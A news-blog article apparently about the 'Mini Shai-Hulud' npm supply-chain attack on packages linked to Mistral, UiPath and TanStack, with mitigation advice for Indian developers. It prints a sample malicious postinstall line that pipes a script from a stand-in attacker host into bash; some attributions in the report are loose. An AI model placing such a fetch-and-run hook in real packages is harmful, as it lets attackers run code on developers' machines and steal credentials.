What went down?
Earlier this week, security researchers uncovered that dozens of npm packages tied to Mistral (the open‑source LLM framework), UiPath (the RPA tool) and TanStack’s web‑dev stack – especially react-router – were compromised. The attackers injected a tiny backdoor that fetches and runs a remote script at runtime. The infection vector appears to be a supply‑chain attack dubbed “Mini Shai‑Hulud”, a stripped‑down version of the infamous Shai‑Hulud worm that targets JavaScript ecosystems.
How the attack works
The malicious code lives in the postinstall script of the compromised packages. When a developer runs npm install, the script silently contacts a command‑and‑control server, downloads a second‑stage payload and executes it with the same privileges as the developer’s Node process. In most cases the payload is a simple curl | bash one‑liner that drops a crypto‑miner or a credential‑stealer.
#!/usr/bin/env node
require('child_process').execSync('curl -s https://malicious.example.com/install.sh | bash');
Because the script runs during install, it bypasses most code‑review processes – developers rarely inspect postinstall hooks.
Who’s affected?
- Mistral: Packages like
mistral‑clientandmistral‑utilswere targeted. These are used by Indian startups building LLM‑powered chatbots for banking and e‑commerce. - UiPath: The compromised
uipath‑node‑sdkis a thin wrapper many automation consultants use to trigger bots from Node services. - TanStack (React‑Router): Several minor utility packages that extend routing –
react‑router‑dom‑helpersandrouter‑guard– were infected. Sincereact‑routeris a core dependency for most React apps, the blast radius is huge.
Why Indian devs should care
India is the world’s biggest consumer of open‑source JavaScript libraries. A compromised package can silently turn a production server into a mining rig or a data‑exfiltration point, putting UPI‑linked services, health‑tech APIs and even government portals at risk. Moreover, many Indian firms still run CI pipelines on cheap VMs with default root privileges – a perfect playground for a postinstall payload.
What to do right now
- Audit your lock‑files. Run
npm auditand look for any package that mentionspostinstallscripts you didn’t add. - Pin versions. Add exact version numbers for all TanStack, Mistral and UiPath dependencies in
package‑lock.jsonoryarn.lock. - Enable npm’s
--ignore‑scriptsflag on CI builds and only enable scripts after a manual review. - Regenerate your lock‑file. Delete
node_modulesandpackage‑lock.json, then runnpm cion a clean machine. - Monitor network traffic. Look for outbound connections to unknown domains during npm install.
Long‑term safeguards
We’re seeing a shift from “trust the registry” to “verify every script”. Consider these practices:
- Use
npm ci --prefer‑offlinein production pipelines. - Adopt
npm audit fix --forceonly after reviewing the changelog. - Leverage tools like
SnykorGitHub Dependabotthat flag suspiciouspostinstallhooks. - Shift critical automation code to compiled languages (Go, Rust) where supply‑chain attacks are harder.
Our take – TamilTech’s opinion
Supply‑chain attacks are becoming the new normal for JavaScript. The Mini Shai‑Hulud episode proves that even “minor” utility packages can be weaponised. Indian developers need to stop treating npm as a black box and start treating every install as a potential security event.
We’re also noticing that many of the compromised packages were published by “new” maintainers with few followers. That’s a red flag – always check the maintainer’s profile, GitHub stars and issue activity before adding a new dependency.
What’s next?
The attackers have already taken down the malicious packages from npm, but the damage is done for anyone who pulled them before the takedown. Expect more “clean‑up” notices in the next few days and possibly a new wave of fake patches that try to replace the removed versions.
Stay tuned – we’ll keep monitoring the situation and update you with any new indicators of compromise.




Comments (0)
Be the first to comment!